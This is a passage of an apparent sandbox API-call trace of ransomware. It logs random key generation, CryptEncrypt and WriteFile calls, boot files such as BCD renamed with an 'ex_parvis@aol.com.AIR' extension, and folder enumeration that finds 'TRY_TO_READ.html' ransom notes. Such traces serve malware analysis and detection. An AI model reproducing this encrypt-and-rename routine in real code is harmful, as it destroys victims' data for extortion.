hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0116.526] GetProcessHeap () returned 0x2e0000 [0116.526] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x350fa0 [0116.526] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x350fa0*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x350fa0*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0116.526] WriteFile (in: hFile=0x3d8, lpBuffer=0x350fa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x350fa0*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0116.527] WriteFile (in: hFile=0x3d8, lpBuffer=0x330a48*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330a48*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0116.527] WriteFile (in: hFile=0x3d8, lpBuffer=0x330a48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330a48*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0116.527] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1) returned 0x330a58 [0116.527] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1) returned 0x330a68 [0116.527] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.527] ReadFile (in: hFile=0x3d8, lpBuffer=0x330a58, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330a58*, lpNumberOfBytesRead=0x2acf9c8*=0x0, lpOverlapped=0x0) returned 1 [0116.527] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.527] WriteFile (in: hFile=0x3d8, lpBuffer=0x330a68*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330a68*, lpNumberOfBytesWritten=0x2acf9c8*=0x0, lpOverlapped=0x0) returned 1 [0116.527] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a58 | out: hHeap=0x2e0000) returned 1 [0116.527] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a68 | out: hHeap=0x2e0000) returned 1 [0116.527] CloseHandle (hObject=0x3d8) returned 1 [0116.528] GetProcessHeap () returned 0x2e0000 [0116.528] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350fa0 | out: hHeap=0x2e0000) returned 1 [0116.528] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350e98 | out: hHeap=0x2e0000) returned 1 [0116.528] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.528] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.528] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0116.528] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0116.528] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x350e98 [0116.528] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.528] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x350e98 | out: pbBuffer=0x350e98) returned 1 [0116.528] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330a48 | out: pbBuffer=0x330a48) returned 1 [0116.528] SetFileAttributesW (lpFileName="C:\\\\Boot\\BCD.LOG1", dwFileAttributes=0x80) returned 1 [0116.528] lstrlenW (lpString="C:\\\\Boot\\BCD.LOG1") returned 17 [0116.529] GetProcessHeap () returned 0x2e0000 [0116.529] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x88) returned 0x30e4b0 [0116.529] lstrcpyW (in: lpString1=0x30e4b0, lpString2="C:\\\\Boot\\BCD.LOG1" | out: lpString1="C:\\\\Boot\\BCD.LOG1") returned="C:\\\\Boot\\BCD.LOG1" [0116.529] lstrcatW (in: lpString1="C:\\\\Boot\\BCD.LOG1", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\BCD.LOG1.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\BCD.LOG1.12781717671972518758.ex_parvis@aol.com.AIR" [0116.529] MoveFileExW (lpExistingFileName="C:\\\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="C:\\\\Boot\\BCD.LOG1.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bcd.log1.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0116.531] CreateFileW (lpFileName="C:\\\\Boot\\BCD.LOG1.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bcd.log1.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0116.531] GetProcessHeap () returned 0x2e0000 [0116.531] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0116.531] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=0) returned 1 [0116.531] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x0 [0116.531] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0116.531] GetProcessHeap () returned 0x2e0000 [0116.531] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x350fa0 [0116.531] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x350fa0*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x350fa0*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0116.531] WriteFile (in: hFile=0x3d8, lpBuffer=0x350fa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x350fa0*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0116.532] WriteFile (in: hFile=0x3d8, lpBuffer=0x330a48*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330a48*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0116.532] WriteFile (in: hFile=0x3d8, lpBuffer=0x330a48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330a48*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0116.532] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1) returned 0x330a68 [0116.532] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1) returned 0x330a58 [0116.532] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.532] ReadFile (in: hFile=0x3d8, lpBuffer=0x330a68, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330a68*, lpNumberOfBytesRead=0x2acf9c8*=0x0, lpOverlapped=0x0) returned 1 [0116.533] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.533] WriteFile (in: hFile=0x3d8, lpBuffer=0x330a58*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x330a58*, lpNumberOfBytesWritten=0x2acf9c8*=0x0, lpOverlapped=0x0) returned 1 [0116.533] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a68 | out: hHeap=0x2e0000) returned 1 [0116.533] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a58 | out: hHeap=0x2e0000) returned 1 [0116.533] CloseHandle (hObject=0x3d8) returned 1 [0116.533] GetProcessHeap () returned 0x2e0000 [0116.533] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350fa0 | out: hHeap=0x2e0000) returned 1 [0116.533] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350e98 | out: hHeap=0x2e0000) returned 1 [0116.533] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a48 | out: hHeap=0x2e0000) returned 1 [0116.533] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0116.533] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.533] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.533] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x350e98 [0116.533] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a48 [0116.533] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x350e98 | out: pbBuffer=0x350e98) returned 1 [0116.533] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330a48 | out: pbBuffer=0x330a48) returned 1 [0116.534] SetFileAttributesW (lpFileName="C:\\\\Boot\\BCD.LOG", dwFileAttributes=0x80) returned 1 [0116.534] lstrlenW (lpString="C:\\\\Boot\\BCD.LOG") returned 16 [0116.534] GetProcessHeap () returned 0x2e0000 [0116.534] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x86) returned 0x30e4b0 [0116.534] lstrcpyW (in: lpString1=0x30e4b0, lpString2="C:\\\\Boot\\BCD.LOG" | out: lpString1="C:\\\\Boot\\BCD.LOG") returned="C:\\\\Boot\\BCD.LOG" [0116.534] lstrcatW (in: lpString1="C:\\\\Boot\\BCD.LOG", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\BCD.LOG.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\BCD.LOG.12781717671972518758.ex_parvis@aol.com.AIR" [0116.534] MoveFileExW (lpExistingFileName="C:\\\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), lpNewFileName="C:\\\\Boot\\BCD.LOG.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bcd.log.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.534] CreateFileW (lpFileName="C:\\\\Boot\\BCD.LOG.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bcd.log.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.534] GetProcessHeap () returned 0x2e0000 [0116.534] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0116.534] CloseHandle (hObject=0xffffffff) returned 0 [0116.534] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.534] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445a8 | out: hHeap=0x2e0000) returned 1 [0116.534] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350818 [0116.534] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x350fa0 [0116.534] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a58 [0116.534] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x350fa0 | out: pbBuffer=0x350fa0) returned 1 [0116.534] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330a58 | out: pbBuffer=0x330a58) returned 1 [0116.534] SetFileAttributesW (lpFileName="C:\\\\Boot\\BCD", dwFileAttributes=0x80) returned 1 [0116.534] lstrlenW (lpString="C:\\\\Boot\\BCD") returned 12 [0116.535] GetProcessHeap () returned 0x2e0000 [0116.535] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x7e) returned 0x328578 [0116.535] lstrcpyW (in: lpString1=0x328578, lpString2="C:\\\\Boot\\BCD" | out: lpString1="C:\\\\Boot\\BCD") returned="C:\\\\Boot\\BCD" [0116.535] lstrcatW (in: lpString1="C:\\\\Boot\\BCD", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\BCD.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\BCD.12781717671972518758.ex_parvis@aol.com.AIR" [0116.535] MoveFileExW (lpExistingFileName="C:\\\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), lpNewFileName="C:\\\\Boot\\BCD.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bcd.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.535] CreateFileW (lpFileName="C:\\\\Boot\\BCD.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\bcd.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.535] GetProcessHeap () returned 0x2e0000 [0116.535] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328578 | out: hHeap=0x2e0000) returned 1 [0116.535] CloseHandle (hObject=0xffffffff) returned 0 [0116.535] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350818 | out: hHeap=0x2e0000) returned 1 [0116.535] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a8c8 | out: hHeap=0x2e0000) returned 1 [0116.535] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 [0116.535] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a8f0 | out: hHeap=0x2e0000) returned 1 [0116.535] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a968 | out: hHeap=0x2e0000) returned 1 [0116.535] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a940 | out: hHeap=0x2e0000) returned 1 [0116.535] FindFirstFileW (in: lpFileName="C:\\\\Config.Msi\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x96efd190, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96efd190, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x317bc8 [0116.535] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.535] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.535] GetLastError () returned 0x6 [0116.535] SetLastError (dwErrCode=0x6) [0116.535] GetLastError () returned 0x6 [0116.535] SetLastError (dwErrCode=0x6) [0116.536] GetLastError () returned 0x6 [0116.536] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.536] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324b98 [0116.536] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.536] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a940 [0116.536] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317c08 [0116.536] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317c08 | out: hHeap=0x2e0000) returned 1 [0116.536] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.536] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.536] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a940 | out: hHeap=0x2e0000) returned 1 [0116.536] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.536] FindNextFileW (in: hFindFile=0x317bc8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x96efd190, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96efd190, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.536] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.536] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.536] GetLastError () returned 0x6 [0116.536] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.536] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324b98 [0116.536] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.536] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x33a940 [0116.536] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317c08 [0116.536] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317c08 | out: hHeap=0x2e0000) returned 1 [0116.536] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.536] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.536] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33a940 | out: hHeap=0x2e0000) returned 1 [0116.536] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.536] FindNextFileW (in: hFindFile=0x317bc8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96efd190, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96efd190, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96efd190, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.536] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.536] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.536] GetLastError () returned 0x6 [0116.536] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.536] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0116.536] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.537] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.537] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0116.537] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.537] FindNextFileW (in: hFindFile=0x317bc8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96efd190, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96efd190, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96efd190, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.537] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x46) returned 0x3334b8 [0116.537] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344570 | out: hHeap=0x2e0000) returned 1 [0116.537] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.537] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445a8 | out: hHeap=0x2e0000) returned 1 [0116.537] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.537] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dea0 | out: hHeap=0x2e0000) returned 1 [0116.537] FindFirstFileW (in: lpFileName="C:\\\\Documents and Settings\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96efd190, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96efd190, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96efd190, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0116.537] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dea0 [0116.537] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.537] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34def0 | out: hHeap=0x2e0000) returned 1 [0116.537] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dec8 | out: hHeap=0x2e0000) returned 1 [0116.537] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x96f232f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f232f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x317c08 [0116.537] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.537] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.537] GetLastError () returned 0x5 [0116.537] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 [0116.537] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324b98 [0116.537] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.537] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dec8 [0116.537] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317c48 [0116.538] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317c48 | out: hHeap=0x2e0000) returned 1 [0116.538] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.538] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.538] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dec8 | out: hHeap=0x2e0000) returned 1 [0116.538] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445a8 | out: hHeap=0x2e0000) returned 1 [0116.538] FindNextFileW (in: hFindFile=0x317c08, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x96f232f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f232f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.538] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.538] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.538] GetLastError () returned 0x5 [0116.538] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3445a8 [0116.538] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324b98 [0116.538] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324b98 | out: hHeap=0x2e0000) returned 1 [0116.538] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dec8 [0116.538] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317c48 [0116.538] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317c48 | out: hHeap=0x2e0000) returned 1 [0116.538] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.538] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.538] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dec8 | out: hHeap=0x2e0000) returned 1 [0116.538] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3445a8 | out: hHeap=0x2e0000) returned 1 [0116.538] FindNextFileW (in: hFindFile=0x317c08, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, 